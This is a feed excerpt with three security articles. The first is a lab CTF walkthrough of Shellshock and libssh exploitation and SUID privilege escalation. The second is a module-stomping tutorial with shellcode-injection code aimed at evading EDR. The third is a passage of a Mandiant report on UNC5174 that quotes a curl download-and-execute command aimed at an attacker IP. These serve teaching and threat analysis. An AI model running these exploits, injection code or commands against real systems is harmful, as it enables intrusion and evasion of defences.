<content:encoded><![CDATA[<h4><em>A beginner-friendly walkthrough covering Shellshock exploitation, libssh authentication bypass, and SUID privilege escalation across two Linux targets.</em></h4><p>Hello everyone! 👋</p><p>In this blog, I’ll walk through the System-Host Based Attacks CTF 2 from INE’s eJPT path and explain how I approached each flag. The focus is on methodology and reasoning — not just dropping commands.</p><p>This lab has two Linux targets: target1.ine.local and target2.ine.local. The goal is to capture four flags hidden across both machines using system and host-based attack techniques.</p><blockquote><strong><em>Note:</em></strong><em> If any exploit doesn’t work as expected, restart the CTF and try again.</em></blockquote><p>So, let’s dive in.</p><h3>Q. Check the root (‘/’) directory for a file that might hold the key to the first flag on target1.ine.local.</h3><p>As usual, I started with an Nmap scan to identify the running services.</p><pre>nmap -T5 -A target1.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OKmRtwohV_ZbMsmSBz6OyQ.png"><figcaption>nmap results</figcaption></figure><p>Only one port was open — port 80 running Apache httpd 2.4.6. I navigated to http://target1.ine.local and it automatically redirected to /browser.cgi.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PnQK2V7txa4lhCorr4XW9Q.png"><figcaption><a href="http://target1.ine.local/">http://target1.ine.local</a></figcaption></figure><p>That immediately clicked — a CGI file on Apache 2.4.6? This could be Shellshock.</p><p>I ran DIRB to enumerate the directories:</p><pre>dirb http://target1.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/952/1*48QyujOhagOr56o4CWjTxg.png"><figcaption>dirb result</figcaption></figure><p>DIRB found a /cgi-bin/ directory returning 403 Forbidden, and confirmed the /browser.cgi file. To verify the vulnerability, I ran Nmap's shellshock detection script directly against that path:</p><pre>nmap -T5 -sV -p 80 --script http-shellshock \<br>  --script-args uri=/browser.cgi target1.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iUnIg38oYq2396YH3WXJ3g.png"></figure><p>The target was <strong>VULNERABLE</strong> to CVE-2014–6271 — the server was executing commands injected via HTTP headers.</p><p>I searched for a compatible Metasploit module for Apache 2.4.6 and loaded it up:</p><pre>use exploit/multi/http/apache_mod_cgi_bash_env_exec<br>set rhosts target1.ine.local<br>set lhost &lt;your-ip&gt;<br>set targeturi /browser.cgi<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ViDWpdVqhW4mxV3yVZu0BQ.png"></figure><p>A Meterpreter session opened. I listed the contents of the root / directory:</p><pre>meterpreter &gt; ls /</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/954/1*EqnjnOISbP-qLntxMN7oKA.png"><figcaption>flag1</figcaption></figure><p>Right there in the root — flag.txt.</p><h3>Q. In the server’s root directory, there might be something hidden. Explore ‘/opt/apache/htdocs/’ carefully to find the next flag on target1.ine.local.</h3><p>Still on the same Meterpreter session. The hint said <em>something hidden</em> — so I listed with the -a flag to catch hidden files:</p><pre>meterpreter &gt; ls -a /opt/apache/htdocs/</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/895/1*UXWgQQEtgp5VOEpyZRdIDA.png"><figcaption>flag2</figcaption></figure><p>There it was — .flag.txt. Hidden in plain sight, invisible to a regular ls.</p><h3>Q. Investigate the user’s home directory and consider using ‘libssh_auth_bypass’ to uncover the flag on target2.ine.local.</h3><p>I kicked off a fresh Nmap scan on the second target:</p><pre>nmap -T5 -A target2.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CPki2EbnLCO4e7Xq-XWxDA.png"></figure><p>Only one port open — port 22 running <strong>libssh 0.8.3</strong>. The hint was already pointing at the exact module to use.</p><p>In Metasploit:</p><pre>use auxiliary/scanner/ssh/libssh_auth_bypass<br>set rhosts target2.ine.local<br>set spawn_pty true<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tuz0hfzMTWlm3_l2SiYxrA.png"></figure><p>A shell session opened — no credentials needed. I interacted with the session and navigated to the user’s home directory:</p><pre>sessions 3<br>/bin/bash -i<br>ls /home/user</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-R9WgvD6CLtPaEaBSKyd8w.png"><figcaption>flag3</figcaption></figure><p>flag.txt was right there in /home/user — alongside two other interesting files: greetings and welcome.</p><h3>Q. The most restricted areas often hold the most valuable secrets. Look into the ‘/root’ directory to find the hidden flag on target2.ine.local.</h3><p>Those two files — greetings and welcome — were worth investigating. I checked their permissions:</p><pre>ls -la</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/731/1*9s56QChBPHKjs-XHTP3eDQ.png"></figure><ul><li>welcome — owned by root, <strong>SUID bit set</strong> (-rwsr-xr-x), executable by us</li><li>greetings — owned by root, <strong>no permissions</strong> for us (-rwx------)</li></ul><p>I ran strings on welcome to understand what it was doing:</p><pre>strings welcome</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/981/1*Z5t7E6B2KyZ0Ntlu64F-OQ.png"></figure><p>Inside the output, I could see it was calling the greetings binary. So welcome runs as root via SUID — and it calls greetings. If I replace greetings with something I control, I get root execution.</p><p>I tried running ./greetings directly — Permission denied. As expected.</p><p>So I deleted it and replaced it with a copy of bash:</p><pre>rm -rf greetings<br>cp /bin/bash greetings<br>./welcome</pre><p>Running welcome now called my fake greetings — which was just bash. Since welcome carries root privileges via SUID, I got a root shell.</p><pre>ls /root</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/928/1*cshdJolyBJKYEUYuq9poCA.png"><figcaption>flag4</figcaption></figure><p>flag.txt was right there in /root.</p><h3>Final Thoughts</h3><p>This CTF introduced two techniques worth understanding properly — Shellshock and SUID abuse.</p><p>Shellshock is over a decade old, but unpatched Apache CGI setups still exist in the wild. The SUID escalation was the most interesting part: welcome trusted an external binary without verifying it, and that trust was the vulnerability. Replace the file, inherit root privileges. Simple — and something you'll encounter again in real engagements.</p><p>Thanks for reading!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9c11f35cbcd6" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/host-network-penetration-testing-system-host-based-attacks-ctf-2-ejpt-ine-9c11f35cbcd6">Host &amp; Network Penetration Testing: System-Host Based Attacks CTF 2 — eJPT (INE)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[An Introduction to Module Stomping]]></title>
<description><![CDATA[Overwriting DLLs for Windows Process InjectionBackgroundContextIn modern adversary emulation, generic process-injection techniques are closely scrutinized. Legacy approaches like cross-process thread creation with unbacked memory regions trigger immediate behavioral telemetry and get instantly po...]]></description>
<link>https://tsecurity.de/de/3579536/hacking/an-introduction-to-module-stomping/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579536/hacking/an-introduction-to-module-stomping/</guid>
<pubDate>Sun, 07 Jun 2026 16:53:54 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Overwriting DLLs for Windows Process Injection</h4><h3>Background</h3><h4>Context</h4><p>In modern adversary emulation, generic process-injection techniques are closely scrutinized. Legacy approaches like cross-process thread creation with unbacked memory regions trigger immediate behavioral telemetry and get instantly popped by memory scanners.</p><p>To bypass these hurdles, we need to <em>slide</em> past detection. Enter <strong>Module Stomping,</strong> a technique that involves overwriting the .text section of a loaded, signed DLL to hide our payload inside a disk-backed memory region.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1000/1*U8UJ8_acKRS5lhXe38CWeg.png"><figcaption>CHA CHA NOW YA’LL</figcaption></figure><p>In this post, I will outline the basic workflow and some common primitives used in <strong>module stomping for Windows process injection</strong>.</p><h4>Tools</h4><p>All module stomping code referenced in this post can be found in the ‘module-injection’ folder in my ‘windows-process-injection’ repository.</p><p><a href="https://github.com/toneillcodes/windows-process-injection">GitHub - toneillcodes/windows-process-injection: A collection of techniques for process injection on Windows</a></p><p><strong>SystemInformer</strong> can optionally be used to follow the workflow and will be covered in the example PoC section of this post.</p><p><a href="https://systeminformer.sourceforge.io/">System Informer</a></p><h3>Module Stomping</h3><h4>Workflow &amp; Primitives</h4><p>The following is an outline of a common module stomping workflow.</p><ul><li><strong>Step One</strong>: Identify a <strong>target module</strong> or use LoadLibraryExA to load a ‘sacrificial’ module to serve as the <strong>stomping target</strong>.</li><li><strong>Step Two:</strong> Identify an <strong>address</strong> within the target module’s address space to <strong>write </strong>our <strong>buffer</strong> (typically by locating a specific exported function via GetProcAddress).</li><li><strong>Step Three:</strong> <strong>Write </strong>our<strong> buffer</strong> to the <strong>address </strong>from Step Two with WriteProcessMemory<strong>.</strong></li><li><strong>Step Four:</strong> Create a <strong>new thread</strong> using the <strong>buffer address </strong>from Step Two with CreateThread.</li></ul><p>While this foundational workflow is completely functional, a stock implementation like this leaves a massive trail of Indicators of Compromise (IoCs). In the sections below, we’ll analyze how this basic approach trips modern defenses, and how we can modify the code to obscure both static and dynamic signatures.</p><h3>Proof-of-Concept</h3><h4>Local Stomping</h4><p>The cleanest way to map out this tradecraft is by executing it within our current process context. This keeps our debugging loop simple and focuses purely on the memory manipulation itself. Let’s break down the core logic using the <a href="https://github.com/toneillcodes/windows-process-injection/blob/main/module-stomping/local-stomp.cpp">local-stomp.cpp</a> source file from the ‘<a href="https://github.com/toneillcodes/windows-process-injection">Windows Process Injection</a>’ repository.</p><p>First, we need to open a handle to the current process using OpenProcess.</p><pre>// Open a handle to the current process<br>HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid));<br>if(pHandle == NULL) {<br>    printf("Failed to acquire process handle!\n");<br>    return -1;<br>}<br>printf("[*] Successfully opened handle to PID: %u\n", pid);</pre><p>Now that we have a handle, we need to either locate or load the target module.</p><p>For this demonstration, we’ll load wininet.dll; it’s fairly large and so it can accommodate testing different payloads. Using LoadLibraryExA is not always a good idea, but it is helpful for demonstrating the concept.</p><pre>// load sacrificial DLL, using wininet because it is fairly large and so it can accomodate different PoC payloads<br>HMODULE hSacrificialDll = LoadLibraryExA("wininet.dll", NULL, DONT_RESOLVE_DLL_REFERENCES);<br>if (hSacrificialDll == NULL) {<br>    printf("[ERROR] Failed to obtain DLL handle! Error: %lu\n", GetLastError());<br>    return -1;<br>}<br>printf("[*] Target DDL loaded.\n");</pre><p>We need to identify the .text section of the module. We can either locate the section itself or search the module for a specific function.</p><p>For the sake of demonstration, we will leverage the GetProcAddresss function. We pass a handle to the module and the function name we want to locate, and it will return the address.</p><pre>LPVOID targetAddress = (LPVOID)GetProcAddress(hSacrificialDll, "CommitUrlCacheEntryW");  <br>if (targetAddress == NULL) {<br>    printf("[ERROR] Failed to locate target function CommitUrlCacheEntryW! Error: %lu\n", GetLastError());<br>    return -1;<br>}<br>printf("[*] Target wininet.dll!CommitUrlCacheEntryW located at: : 0x%016llx\n", targetAddress);</pre><p>Now that we have a target address, we can overwrite module code with our own buffer by using targetAddress as the destination parameter for WriteProcessMemory.</p><pre>// Write the shellcode to the block of memory that we allocated with VirtualAllocEx<br>BOOL writeShellcode = WriteProcessMemory(pHandle, targetAddress, buf, sizeof buf, NULL);<br>if(writeShellcode == false) {<br>    printf("[ERROR] Failed to write shellcode! Using addresss: 0x%016llx, Error: %lu\n", targetAddress, GetLastError());<br>    FreeLibrary(hSacrificialDll);<br>    return -1;<br>}</pre><p>Finally, execute our buffer by creating a new thread, using the targetAddress value as the lpStartAddress parameter for CreateThread.</p><pre>// Create a new thread using the shellcode buffer address as the starting point<br>HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)targetAddress, NULL, 0, NULL);<br>if (tHandle == NULL) {<br>    printf("[ERROR] Failed to create thread within the process (PID: %u)! Error: %lu\n", pid, GetLastError());<br>    FreeLibrary(hSacrificialDll);<br>    return -1;<br>}</pre><h4>Compile</h4><p>Compile the local-stomp.cpp example code and suppress warnings.</p><pre>windows-process-injection\module-stomping&gt;cl.exe local-stomp.cpp /W0<br>Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27054 for x64<br>Copyright (C) Microsoft Corporation.  All rights reserved.<br><br>local-stomp.cpp<br>Microsoft (R) Incremental Linker Version 14.16.27054.0<br>Copyright (C) Microsoft Corporation.  All rights reserved.<br><br>/out:local-stomp.exe<br>local-stomp.obj<br><br>windows-process-injection\module-stomping&gt;</pre><h4>Execute &amp; Validate</h4><p>The PoC includes pauses to help track the workflow. In this example, we will use SystemInformer (previously ProcessHacker) to illustrate the process.</p><ul><li>Run local-stomp.exe and pause at the first prompt to openSystemInformer and locate the process using the PID from the output.</li></ul><pre>windows-process-injection\module-stomping&gt;local-stomp.exe<br>[*] Running PI with target PID: 1100<br>[*] Successfully opened handle to PID: 1100<br>[*] Press Enter to load the sacrificial DLL: &lt;Enter&gt;</pre><ul><li>Double-click on the process from the list and, in the process Properties panel, open the ‘Modules’ tab. Note that at this point, only kernel32.dll and ntdll.dll have been loaded.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/803/1*3eEGhC1xWr1UavK-5qdOmQ.png"><figcaption>Baseline modules for our simple executable.</figcaption></figure><ul><li>Back at the console, press Enter to resume the process and load the sacrificial DLL wininet.dll and locate the CommitUrlCacheEntryW function.</li></ul><pre>windows-process-injection\module-stomping&gt;local-stomp.exe<br>[*] Running PI with target PID: 1100<br>[*] Successfully opened handle to PID: 1100<br>[*] Press Enter to load the sacrificial DLL: &lt;Enter&gt;<br>[*] Target DLL loaded.<br>[*] Target wininet.dll!CommitUrlCacheEntryW located at: 0x00007ff917297f30<br>[*] Press Enter to write the shellcode:</pre><ul><li>In the console output, note the function’s address:0x00007ff917297f30. Back in SystemInformer, review the ‘Modules’ list. It should contain a new entry for wininet.dll.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/569/1*Uhmm5xWDW6I6UBbMVgGJdw.png"><figcaption>Refreshed module list shows the wininet.dll module</figcaption></figure><ul><li>Switch to the ‘Memory’ tab in SystemInformer and sort by ‘Base Address’. Locate the .text section of the target module by looking for the section that contains the function address (hint: it should have a ‘Use’ value of ‘C:\Windows\System32\wininet.dll’ with RXprotection).</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/886/1*nHU_Breu5s4Tsw_Olc1_TQ.png"><figcaption>Locating the .text section of wininet.dll based on properties</figcaption></figure><ul><li>Right-click and copy the ‘Base Address’ of this section. In this case, the address was 0x7ff917221000</li><li>Subtract the function address from the section base to obtain the offset 0x00007ff917297f30 - 0x00007ff917221000 = 0x76F30</li><li>Double-click the Memory entry to view the contents. When the window loads, click the ‘Go to…’ button and enter the offset found when subtracting the function from the module base RVA. (0x76F30). The code has not been tampered with and contains legitimate wininet.dll code.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/672/1*g_qbDlvL5Fy8eT9ILWU5uA.png"><figcaption>Baseline module code that has not been tampered with</figcaption></figure><ul><li>Back at the console, press ‘Enter’ to write the shellcode to the target address</li></ul><pre>...<br>[*] Target wininet.dll!CommitUrlCacheEntryW located at: 0x00007ff917297f30<br>[*] Press Enter to write the shellcode: &lt;Enter&gt;</pre><ul><li>Back in SystemInformer, in the ‘Memory’ tab, click the ‘Re-read’ button to refresh the memory at the target address. It should now reflect the bytes from our buffer.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/679/1*GKuMMgC04Abr8wY-3O008A.png"><figcaption>Updated memory shows our payload bytes and the calc.exe string</figcaption></figure><ul><li>Press ‘Enter’ one last time and confirm that the payload executes. Unless replaced, the shellcode is the Win32 calculator payload from Metasploit’s msfvenom.</li></ul><pre>...<br>[*] Press Enter to write the shellcode: &lt;Enter&gt;<br>[*] Press Enter to execute the shellcode: &lt;Enter&gt;<br>[*] Waiting for the thread to return...<br>[*] Process injection complete.<br><br>windows-process-injection\module-stomping&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GhhEn6_WRWzzCJoK6mTPTw.png"><figcaption>Full execution resulting in a…calculator!</figcaption></figure><h3>Conclusion</h3><h4>Summary</h4><ul><li>Module stomping successfully circumvents traditional allocation traps by hiding payloads directly within the .text section of legitimate DLLs.</li><li>Module stomping is a valuable tool for Windows process injection.</li><li>While highly functional as a baseline injection primitive, a vanilla implementation introduces secondary Indicators of Compromise (IoCs) via static imports and API strings.</li><li>Modern EDR platforms and memory scanners don’t just look for unbacked memory; they actively perform verification checks to spot when a loaded module’s in-memory bytes deviate from its on-disk image.</li></ul><h3>Next Steps</h3><h4>Enhancements</h4><p>While this foundational implementation gets our code running under the guise of a legitimate DLL, it leaves obvious footprints. In the next post, we will look at moving beyond basic local execution to explore:</p><ul><li><strong>Remote Module Stomping:</strong> Orchestrating this dance inside a remote target process.</li><li><strong>Dynamic Function Resolution:</strong> Using PEB-walking techniques to reduce static IoCs and avoid highly scrutinized APIs.</li><li><strong>Targeted Stomping Workflow:</strong> Custom tooling to support a workflow for identifying the best target for module stomping operations.</li></ul><h3>References</h3><ul><li>“Module Stomping: Who up stompin they modules” by Dylan Tran<br><a href="https://dtsec.us/2023-11-04-ModuleStompin/">https://dtsec.us/2023-11-04-ModuleStompin/</a></li><li>SystemInformer by Winsider Seminars &amp; Solutions, Inc.<br><a href="https://systeminformer.sourceforge.io/">https://systeminformer.sourceforge.io/</a></li><li>MSDN: OpenProcess<br><a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess</a></li><li>MSDN: LoadLibraryExA<br><a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa">https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa</a></li><li>MSDN: GetProcAddress<br><a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress">https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress</a></li><li>MSDN: CreateThread<br><a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread">https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=26238af76d43" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/an-introduction-to-module-stomping-26238af76d43">An Introduction to Module Stomping</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect]]></title>
<description><![CDATA[Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen

 
During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface. Addit...]]></description>
<link>https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a> affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.</p>
<p>Mandiant assesses UNC5174 (believed to use the persona "Uteus") is a former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS) focused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation. In February 2024, UNC5174 was observed exploiting <a href="https://cloud.google.com/blog/topics/threat-intelligence/connectwise-screenconnect-hardening-remediation" rel="noopener" target="_blank"><u>ConnectWise ScreenConnect vulnerability</u></a> (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1709" rel="noopener" target="_blank"><u>CVE-2024-1709</u></a>) to compromise hundreds of institutions primarily in the U.S. and Canada.</p>
<h2>Targeting and Timeline</h2>
<p>UNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and UK government organizations during October and November 2023, as well as in February 2024.</p>
<p>The actor appears primarily focused on executing access operations. Mandiant observed UNC5174 exploiting various vulnerabilities during this time.</p>
<ul>
<li>ConnectWise ScreenConnect Vulnerability CVE-2024-1709</li>
<li>F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747</li>
<li>Atlassian Confluence CVE-2023-22518</li>
<li>Linux Kernel Exploit CVE-2022-0185</li>
<li>Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525</li>
</ul>
<p>Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig1.max-1000x1000.jpg" alt="UNC5174 global targeting map">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="8pnka">Figure 1: UNC5174 global targeting map</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Initial Disclosure of CVE-2023-46747</h2>
<p>On Oct. 25, 2023, Praetorian published an <a href="https://www.praetorian.com/blog/advisory-f5-big-ip-rce/" rel="noopener" target="_blank"><u>advisory</u></a> and proof-of-concept (PoC) for a zero-day (0-day) vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a>) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user. The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a security advisory on Oct. 27, 2023. The <a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>advisory</u></a> detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability. Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.</p>
<h2>Evidence of Exploitation</h2>
<p>Mandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands via the TMSH. Through investigation it became apparent that UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance like account creation. The anomalous behavior appeared first in the "<em><strong>/var/log/audit</strong></em>" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:</p>
<ul>
<li><em><strong>/etc/passwd</strong></em></li>
<li><em><strong>/etc/shadow</strong></em></li>
<li>The creation of the user's home directory was also replicated at <em><strong>/home/&lt;username&gt;</strong></em>.</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]: 
01420002:5: AUDIT - pid=30629 user=root folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=create 
auth user f5support3 password **** shell bash partition-access 
add { all-partitions { role admin } }

Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash -c id</code></pre>
<p><span>Table 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time.</span></p></div>
<div class="block-paragraph_advanced"><p>The "<em><strong>/var/log/restjavad-audit.log</strong></em>" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user "<em><strong>f5support3</strong></em>". The following log entries show the <em><strong>f5support3</strong></em> user executing bash commands. The body of the POST request contains the bash command being executed.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"POST","uri":"http://localhost:8100
/mgmt/tm/util/bash","status":200,"from":"154.12.177[.]8"}

[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"PATCH","uri":"http://localhost:8100
/mgmt/shared/authz/users/f5support3","status":200,"from":"154.12.177[.]8"}
</code></pre>
<p><span>Table 2: UNC5174 bash commands with newly created username f5support3</span></p></div>
<div class="block-paragraph_advanced"><p>UNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:</p>
<ul>
<li>F5support3</li>
<li>F5_admin</li>
<li>f5_support</li>
</ul>
<h2>Post-Exploitation Tactics by UNC5174 After Successful Account Creation</h2>
<h3>SNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL</h3>
<p>UNC5174 leveraged their newly minted TMSH access to download and execute "/tmp/watchsys" using a cURL command. Mandiant's analysis of the file "/tmp/watchsys" identified it as a new 64-bit ELF downloader we have named <u>SNOWLIGHT</u>.</p>
<p>The following chained bash` commands attributed to UNC5174 will perform the following actions related to SNOWLIGHT: </p>
<ol>
<li>Delete any file previously written to /tmp/watchsys.</li>
<li>Forcefully kill the process "watchsys" if it is running.</li>
<li>Download the file from a remote URL to /tmp/watchsys.</li>
<li>Modify the permissions of /tmp/watchsys to allow execution.</li>
<li>Execute /tmp/watchsys using "nohup", so that the process will continue executing after the parent process is terminated.</li>
<li>Perform a directory listing of the /tmp directory.</li>
</ol></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:29:47 localhost.localdomain notice icrd_child[17602]: 
01420002:5: AUDIT - pid=17602 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys 
http://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup 
/tmp/watchsys &amp;;ls -al /tmp/"</code></pre>
<p><span>Table 3: UNC5174 cURL command to download SNOWLIGHT downloader</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig2.max-1000x1000.png" alt="Excerpt showing SNOWLIGHT's decoding routine and memory injection method">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="kdtvq">Figure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>SNOWLIGHT is a downloader written in C and is designed to run on Linux systems. SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&amp;C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet. Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key "0x99".</p>
<p>Finally, the decoded secondary ELF file is loaded into memory using Linux's "sys_memfd_create" and executed via "fexecve". The payload is downloaded directly into memory and executed without ever being written to disk. In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of "". This is identifiable in a running process list as a "memfd" process.</p>
<p>The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators. This payload is then executed in-memory via the previously described memfd method. The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance:</p>
<ul>
<li>Process Name: memfd:a (deleted)</li>
<li>Path: empty (due to the executable being un-backed)</li>
<li>Args: ?</li>
<li>User: root</li>
</ul>
<p>GOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH). Mandiant observed UNC5174 deploy GOREVERSE, which called back to C2 infrastructure we previously observed hosting the SUPERSHELL framework. SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL. </p>
